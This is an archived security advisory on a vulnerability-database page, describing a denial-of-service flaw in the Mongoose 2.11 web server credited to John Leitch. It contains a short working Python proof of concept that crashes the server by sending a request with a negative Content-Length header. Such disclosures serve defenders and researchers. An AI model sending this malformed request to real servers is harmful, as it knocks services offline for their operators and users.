Mongoose 2.11 Denial Of Service

2010.12.30
Credit: John Leitch
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# ------------------------------------------------------------------------ # Software................Mongoose 2.11 # Vulnerability...........Denial Of Service # Download................http://code.google.com/p/mongoose/ # Release Date............12/27/2010 # Tested On...............Windows XP # ------------------------------------------------------------------------ # Author..................John Leitch # Site....................http://www.johnleitch.net/ # Email...................john.leitch5@gmail.com # ------------------------------------------------------------------------ # # --Description-- # # Sending a request with a negative Content-Length field value causes # the server to crash with a read access violation. # # # --PoC-- import socket host = 'localhost' port = 8080 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(8) s.connect((host, port)) s.send('GET / HTTP/1.1\r\n' 'Host: ' + host + '\r\n' 'Content-Length: -2147483648\r\n\r\n')


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top